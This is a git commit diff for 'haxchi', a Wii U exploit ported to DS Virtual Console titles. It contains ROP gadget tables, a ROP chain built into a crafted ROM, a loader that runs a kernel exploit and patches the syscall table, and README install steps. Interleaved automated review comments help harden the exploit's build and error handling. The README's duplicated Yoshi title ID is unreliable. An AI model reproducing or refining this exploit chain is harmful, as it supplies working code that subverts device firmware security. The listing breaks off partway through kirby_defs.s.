added support for kirby squeak squad/mouse attack as well as yoshis island ds

This commit is contained in:
FIX94 2016-11-11 06:47:56 +01:00
parent ad8d63f081
commit e80cd483b9
10 changed files with 274 additions and 90 deletions


@ -1,18 +1,50 @@
.PHONY := all code550.bin .PHONY := all code550.bin
all: WUP-N-DAAP.nds all: brainage kirby yoshids brainage.zip kirby.zip yoshids.zip
code550.bin: brainage: setup_brainage brainage.nds
kirby: setup_kirby kirby.nds
yoshids: setup_yoshids yoshids.nds
setup_brainage:
rm -f *.bin
@cd hbl_loader && make && cd .. @cd hbl_loader && make && cd ..
@cp -f brainage_defs.s defines.s
haxchi_rop_hook.bin haxchi_rop.bin: code550.bin haxchi_rop.s setup_kirby:
rm -f *.bin
@cd hbl_loader && make && cd ..
@cp -f kirby_defs.s defines.s
setup_yoshids:
rm -f *.bin
@cd hbl_loader && make && cd ..
@cp -f yoshids_defs.s defines.s
brainage.nds:
armips haxchi_rop.s armips haxchi_rop.s
WUP-N-DAAP.nds: haxchi_rop_hook.bin haxchi_rop.bin haxchi.s
armips haxchi.s armips haxchi.s
zip -JXjq9 rom.zip WUP-N-DAAP.nds
kirby.nds:
armips haxchi_rop.s
armips haxchi.s
yoshids.nds:
armips haxchi_rop.s
armips haxchi.s
brainage.zip:
zip -JXjq9 brainage.zip brainage.nds
kirby.zip:
zip -JXjq9 kirby.zip kirby.nds
yoshids.zip:
zip -JXjq9 yoshids.zip yoshids.nds
clean: clean:
@rm -f *.bin WUP-N-DAAP.nds rom.zip @rm -f *.bin brainage.nds brainage.zip kirby.nds kirby.zip yoshids.nds yoshids.zip
@cd hbl_loader && make clean && cd .. @cd hbl_loader && make clean && cd ..
@echo "all cleaned up !" @echo "all cleaned up !"
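Review bot: None of the new targets (`brainage`, `kirby`, `yoshids`, the three `setup_*`) is declared phony, because the first line still reads `.PHONY := all code550.bin`, which is a variable assignment rather than the special target, so a stray file named `kirby` would turn `make kirby` into a no-op. Replace it with `.PHONY: all brainage kirby yoshids setup_brainage setup_kirby setup_yoshids clean`. The per-game builds also share one scratch file, `defines.s`, plus `haxchi_rop_hook.bin`/`haxchi_rop.bin`, and only prerequisite order (`brainage: setup_brainage brainage.nds`) sequences the copy before the assemble, so `make -j` can assemble `kirby.nds` against another game's `defines.s`; `brainage.nds:` and `brainage.zip:` have no prerequisites either, so an existing output is never rebuilt after its `*_defs.s` changes. Until the outputs get per-game names or directories, add `.NOTPARALLEL:`, list `brainage.nds` as a prerequisite of `brainage.zip` (likewise kirby/yoshids), and use `$(MAKE)` instead of `make` in the `hbl_loader` recipes. Note that the README's install step still uploads a local `rom.zip`, which this Makefile no longer produces.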


@ -1,18 +1,25 @@
# haxchi # haxchi
This is a ported version of the haxchi exploit created by smea and others for the european release of brain training. This is a ported version of the haxchi exploit created by smea and others for all sorts of different ds vc games.
In addition to being ported it also includes a homebrew launcher loader as its payload so you can use it for a lot of things. In addition to being ported it also includes a homebrew launcher loader as its payload so you can use it for a lot of things.
## install process ## install process
haxchi can be very easily installed using iosuhax's wupclient. for example, if hachihachi is installed to the MLC, it suffices to do: haxchi can be very easily installed using iosuhax's wupclient. for example, if hachihachi is installed to the MLC, it suffices to do:
``` ```
w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/10179C00/content/0010/rom.zip") w.up("rom.zip", "/vol/storage_mlc01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip")
``` ```
of course, using wupclient to install haxchi permanently requires that redNAND be disabled, unless hachihachi is installed to USB, in which case it can be installed from redNAND using: of course, using wupclient to install haxchi permanently requires that redNAND be disabled, unless hachihachi is installed to USB, in which case it can be installed from redNAND using:
``` ```
w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/10179C00/content/0010/rom.zip") w.up("rom.zip", "/vol/storage_usb01/usr/title/00050000/YOUR_GAME_TITLE_ID/content/0010/rom.zip")
``` ```
make sure to replace YOUR_GAME_TITLE_ID with one of the following:
10179B00 - US Brain Age
10179C00 - PAL Brain Training
10198A00 - US Yoshi's Island DS
10198A00 - PAL Yoshi's Island DS
101A5600 - US Kirby Squeak Squad
101A5700 - PAL Kirby Mouse Attack
## contents ## contents

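--- /dev/null
+++ b/brainage_defs.s
+FILE_NDS_NAME equ "brainage.nds"
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1076FAA4)
+HACHI_APPLICATION_PTR equ (0x10A6E038)
+ARM9_ROM_LOCATION equ (0x16220400)
+ARM7_ROM_MEM2_START equ (0xEBDDFC00)
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
+BCTRL equ (RPX_OFFSET + 0x02208EA4)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C)
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201BD28)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC)
+_START_EXIT equ (RPX_OFFSET + 0x02022A70)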
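Review bot: `brainage_defs.s` records a complete set of game-specific addresses but no comment saying which dump they were taken from (game, region, version), while the README now maps this one file to both the US (10179B00) and PAL (10179C00) title IDs and the old README described the port as being for the European release only. Add a header such as `; brainage: addresses taken from <REGION/VERSION OF THE DUMP> -- re-verify before assuming they hold for the other region`, and the same for `kirby_defs.s` and `yoshids_defs.s`, which share the identical layout. A small style nit in `kirby_defs.s`: `HACHI_APPLICATION_PTR equ (0x10c8c938)` is the only constant in the three files written in lowercase hex.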

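--- /dev/null
+++ b/coreinit.s
+; constants for position calcs
+COREINIT_OFFSET equ (- 0xFE3C00)
+; coreinit gadgets
+MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
+; coreinit functions
+OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
+OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
+OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET)
+OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET)
+OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
+MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
+DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
+IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
+OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET)
+OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET)
+OSFATAL equ (0x02015218 + COREINIT_OFFSET)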
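Review bot: `coreinit.s` hard-codes `COREINIT_OFFSET equ (- 0xFE3C00)` and a set of coreinit function addresses that are firmware-specific, but nothing in the file says which firmware they belong to; the only hints are `code550.bin` in the top-level Makefile and `code$(FIRMWARE).bin` in `hbl_loader`, which presumably mean 5.5.0. A header comment such as `; coreinit.rpl offsets for firmware <VERSION> -- must match FIRMWARE in hbl_loader/Makefile; invalid on other versions` would keep the two in step now that this file is shared by all three game builds.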


@ -1,8 +1,7 @@
.create "WUP-N-DAAP.nds", 0 .include "defines.s"
.nds .create FILE_NDS_NAME, 0
; game stack return address .nds
hax_target_address equ 0x1076FAA4
.org 0x000 .org 0x000
.ascii "HAXCHI" ; Game Title .ascii "HAXCHI" ; Game Title
@ -19,7 +18,7 @@ hax_target_address equ 0x1076FAA4
.word arm9_data_end - arm9_data ; ARM9 size .word arm9_data_end - arm9_data ; ARM9 size
.word arm7_data ; ARM7 rom_offset .word arm7_data ; ARM7 rom_offset
.word 0x2000000 ; ARM7 entry_address .word 0x2000000 ; ARM7 entry_address
.word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address .word ARM7_ROM_MEM2_START + HAX_TARGET_ADDRESS ; ARM7 ram_address
.word arm7_data_end - arm7_data ; ARM7 size .word arm7_data_end - arm7_data ; ARM7 size
.org 0x080 .org 0x080


@ -1,64 +1,11 @@
.include "coreinit.s"
; game stack return address .include "defines.s"
hax_target_address equ 0x1076FAA4
; constants for position calcs
COREINIT_OFFSET equ (- 0xFE3C00)
RPX_OFFSET equ (0x01800000)
SYSAPP_OFFSET equ (0x01B75D00)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90)
BCTRL equ (RPX_OFFSET + 0x02208EA4)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0206966C)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A58C4)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200B8D0)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0207AD84)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205182C)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02014E0C)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0213FE6C)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202028C)
; functions used from game and libraries
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02223AEC)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x201BD28)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02222FBC)
_START_EXIT equ (RPX_OFFSET + 0x02022A70)
_SYSLAUNCHMIISTUDIO equ (SYSAPP_OFFSET + 0x020019D4)
OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET)
OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET)
OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
OSSAVESDONE_READYTORELEASE equ (0x0201D5B8 + COREINIT_OFFSET)
OSRELEASEFOREGROUND equ (0x0201D5BC + COREINIT_OFFSET)
OSFATAL equ (0x02015218 + COREINIT_OFFSET)
; more useful definitions ; more useful definitions
CODEGEN_ADR equ 0x01800000 CODEGEN_ADR equ (0x01800000)
HACHI_APPLICATION_PTR equ (0x10A6E038) NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000)
NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000)
NERD_THREAD0OBJECT equ (hax_target_address - 0x1000)
NERD_THREAD2OBJECT equ (hax_target_address - 0x2000)
.macro set_sp,v .macro set_sp,v
.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
@ -155,17 +102,19 @@ NERD_THREAD2OBJECT equ (hax_target_address - 0x2000)
; hacked from arm7 ram offset (unsafe, game stack pointer) ; hacked from arm7 ram offset (unsafe, game stack pointer)
.create "haxchi_rop_hook.bin", hax_target_address .create "haxchi_rop_hook.bin", HAX_TARGET_ADDRESS
.arm.big .arm.big
rop_hook_start: rop_hook_start:
;call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop
;call_func OSFATAL, 0x1007E7A8, 0, 0, 0
; move stack pointer to safe area ; move stack pointer to safe area
set_sp (rop_start - 4) set_sp (rop_start - 4)
.Close .Close
; original game arm9 ram offset (safe, normally arm9 code) ; original game arm9 ram offset (safe, normally arm9 code)
.create "haxchi_rop.bin", 0x16220400 .create "haxchi_rop.bin", ARM9_ROM_LOCATION
.arm.big .arm.big
rop_start: rop_start:
@ -209,7 +158,7 @@ rop_start:
; prepare r31 to be a valid value for the next call ; prepare r31 to be a valid value for the next call
.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
.word 0xDEADBABE ; r30 .word 0xDEADBABE ; r30
.word (0x1076FAA4-0x3000) ; r31 (has to be valid here) .word (HAX_TARGET_ADDRESS-0x3000) ; r31 (has to be valid here)
.word 0xDEAD0001 ; garbage .word 0xDEAD0001 ; garbage
; loads the required value for the addition onto r3 later on ; loads the required value for the addition onto r3 later on
.word LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR .word LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR
@ -253,9 +202,6 @@ rop_start:
call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0 call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
call_func CORE_SHUTDOWN, 0, 0, 0, 0 call_func CORE_SHUTDOWN, 0, 0, 0, 0
; on exit we want to go into mii studio directly
call_func _SYSLAUNCHMIISTUDIO, 0x0, 0x0, 0x0, 0x0
; prepare system for foreground release ; prepare system for foreground release
call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0 call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0
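Review bot: The two commented-out lines `;call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop` and `;call_func OSFATAL, 0x1007E7A8, 0, 0, 0` under `rop_hook_start:` appear, from the hunk counts, to be newly added rather than carried over, and as written they read as debugging leftovers; the second one also reintroduces a bare hard-coded address in a file that this very commit moves to named constants. Either drop them or keep them with one line saying what they are for, e.g. `; debug aids: uncomment one to halt (BCTRL loop) or OSFatal() before the chain runs`. The `.create "haxchi_rop_hook.bin"` block they sit in, and the surrounding file, continue outside the hunk.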


@ -2,10 +2,11 @@ PATH := $(DEVKITPPC)/bin:$(PATH)
PREFIX ?= powerpc-eabi- PREFIX ?= powerpc-eabi-
CC = $(PREFIX)gcc CC = $(PREFIX)gcc
AS = $(PREFIX)gcc AS = $(PREFIX)gcc
CFLAGS = -std=gnu99 -Os -nostdinc -fno-builtin CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g
ASFLAGS = -mregnames -x assembler-with-cpp ASFLAGS = -mregnames -x assembler-with-cpp
LD = $(PREFIX)ld LD = $(PREFIX)ld
LDFLAGS=-Ttext 1800000 --oformat binary -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc OBJCOPY = $(PREFIX)objcopy
LDFLAGS=-Ttext 1800000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/4.8.2 -lgcc
OBJDUMP ?= $(PREFIX)objdump OBJDUMP ?= $(PREFIX)objdump
project := . project := .
root := $(CURDIR) root := $(CURDIR)
@ -35,11 +36,13 @@ main: sd_loader.h
$(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S
cp -r $(root)/*.o $(build) cp -r $(root)/*.o $(build)
rm $(root)/*.o rm $(root)/*.o
$(LD) -s -o ../code$(FIRMWARE).bin $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) $(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map
$(OBJCOPY) code$(FIRMWARE).elf -O binary ../code$(FIRMWARE).bin
clean: clean:
rm -rf $(build) rm -rf $(build)
rm -rf sd_loader.h rm -rf sd_loader.h
rm -rf code$(FIRMWARE).elf code.map
make clean -C sd_loader make clean -C sd_loader
print_stats: print_stats:
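Review bot: `CFLAGS = -std=gnu99 -O0 -nostdinc -fno-builtin -g` replaces `-Os` with `-O0 -g`, which looks like a debugging leftover rather than an intended default: `-g` is harmless once `$(OBJCOPY) ... -O binary` strips the ELF, but `-O0` enlarges the code linked at the fixed `-Ttext 1800000`, which may matter if the payload area is size-constrained. If the debug build is wanted, gate it, e.g. `CFLAGS = -std=gnu99 $(if $(DEBUG),-O0 -g,-Os) -nostdinc -fno-builtin`. The new `clean` line correctly removes `code$(FIRMWARE).elf code.map`, but the recipe below it still invokes `make clean -C sd_loader` rather than `$(MAKE) clean -C sd_loader`, so `-n`/jobserver flags are not propagated.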


@ -41,15 +41,19 @@ extern void KernelPatches(void);
/* ****************************************************************** */ /* ****************************************************************** */
void __main(void) void __main(void)
{ {
/* Quit ongoing menu load music */
unsigned int sound_handle = 0; unsigned int sound_handle = 0;
OSDynLoad_Acquire("snd_core.rpl", &sound_handle); OSDynLoad_Acquire("sndcore2.rpl", &sound_handle);
void (* AXInit)(); if(sound_handle == 0)
void (* AXQuit)(); {
OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit); /* Quit ongoing menu load music */
OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit); OSDynLoad_Acquire("snd_core.rpl", &sound_handle);
AXInit(); void (* AXInit)();
AXQuit(); void (* AXQuit)();
OSDynLoad_FindExport(sound_handle, 0, "AXInit", &AXInit);
OSDynLoad_FindExport(sound_handle, 0, "AXQuit", &AXQuit);
AXInit();
AXQuit();
}
/* Get coreinit handle and keep it in memory */ /* Get coreinit handle and keep it in memory */
unsigned int coreinit_handle; unsigned int coreinit_handle;
@ -82,6 +86,57 @@ void __main(void)
if (private_data.OSEffectiveToPhysical((void *)0xa0000000) == (void *)0) if (private_data.OSEffectiveToPhysical((void *)0xa0000000) == (void *)0)
run_kexploit(&private_data); run_kexploit(&private_data);
/* Prepare for _SYSLaunchMiiStudio thread */
int (*OSCreateThread)(void *thread, void *entry, int argc, void *args, unsigned int stack, unsigned int stack_size, int priority, unsigned short attr);
int (*OSResumeThread)(void *thread);
int (*OSIsThreadTerminated)(void *thread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);
/* Allocate a stack for the thread */
void *stack = private_data.MEMAllocFromDefaultHeapEx(0x1000, 0x20);
/* Create the thread variable */
void *thread = private_data.MEMAllocFromDefaultHeapEx(0x1000, 8);
if(!thread || !stack)
ExitFailure(&private_data, "Thread memory allocation failed. Exit and re-enter browser.");
/* Quickly find _SYSLaunchMiiStudio */
unsigned int sysapp_handle;
void (*_SYSLaunchMiiStudio)(void) = 0;
OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle);
OSDynLoad_FindExport(sysapp_handle, 0, "_SYSLaunchMiiStudio", &_SYSLaunchMiiStudio);
if(_SYSLaunchMiiStudio == (void*)0)
OSFatal("_SYSLaunchMiiStudio is not there?");
/* Do _SYSLaunchMiiStudio in core 1 */
int ret = OSCreateThread(thread, _SYSLaunchMiiStudio, 0, (void*)0, (unsigned int)stack+0x1000, 0x1000, 0, 0x1A);
if (ret == 0)
ExitFailure(&private_data, "Failed to create thread. Exit and re-enter browser.");
/* Schedule it for execution */
OSResumeThread(thread);
/* Can not use OSJoinThread, which hangs for some reason, so we use a detached one and wait for it to terminate */
while(OSIsThreadTerminated(thread) == 0)
{
asm volatile (
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
" nop\n"
);
}
/* Free thread memory and stack */
private_data.MEMFreeToDefaultHeap(thread);
private_data.MEMFreeToDefaultHeap(stack);
/* setup kernel copy data syscall */ /* setup kernel copy data syscall */
kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (unsigned int)KernelCopyData); kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (unsigned int)KernelCopyData);
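Review bot: In the new thread setup, `OSCreateThread`, `OSResumeThread` and `OSIsThreadTerminated` are declared without initializers and never checked after `OSDynLoad_FindExport`, so a failed lookup leaves an indeterminate pointer that is then called a few lines later; `_SYSLaunchMiiStudio` right below gets exactly that null check, and `sysapp_handle` should be initialized to 0 for the same reason. The failure paths are also inconsistent: the sysapp case calls `OSFatal` while the allocation failures use `ExitFailure(&private_data, ...)`. In the first hunk, the `if(sound_handle == 0)` fallback presumably relies on `OSDynLoad_Acquire("sndcore2.rpl", ...)` leaving the handle untouched on failure — confirm that, or test the acquire's return value instead. `__main` starts and ends outside these hunks.
```c
	int (*OSCreateThread)(void *thread, void *entry, int argc, void *args, unsigned int stack, unsigned int stack_size, int priority, unsigned short attr) = 0;
	int (*OSResumeThread)(void *thread) = 0;
	int (*OSIsThreadTerminated)(void *thread) = 0;
	OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);
	if(!OSCreateThread || !OSResumeThread || !OSIsThreadTerminated)
		ExitFailure(&private_data, "coreinit thread exports not found. Exit and re-enter browser.");
	/* ... unchanged: stack/thread allocation ... */
	unsigned int sysapp_handle = 0;
	void (*_SYSLaunchMiiStudio)(void) = 0;
	OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle);
	OSDynLoad_FindExport(sysapp_handle, 0, "_SYSLaunchMiiStudio", &_SYSLaunchMiiStudio);
	if(_SYSLaunchMiiStudio == (void*)0)
		ExitFailure(&private_data, "_SYSLaunchMiiStudio is not there?");
	/* ... unchanged: OSCreateThread / OSResumeThread / wait loop / free ... */
```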

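--- /dev/null
+++ b/kirby_defs.s
+FILE_NDS_NAME equ "kirby.nds"
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x107968AC)
+HACHI_APPLICATION_PTR equ (0x10c8c938)
+ARM9_ROM_LOCATION equ (0x1643F200)
+ARM7_ROM_MEM2_START equ (0xEBBC0E00)
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
+BCTRL equ (RPX_OFFSET + 0x02206FBC)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA50)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
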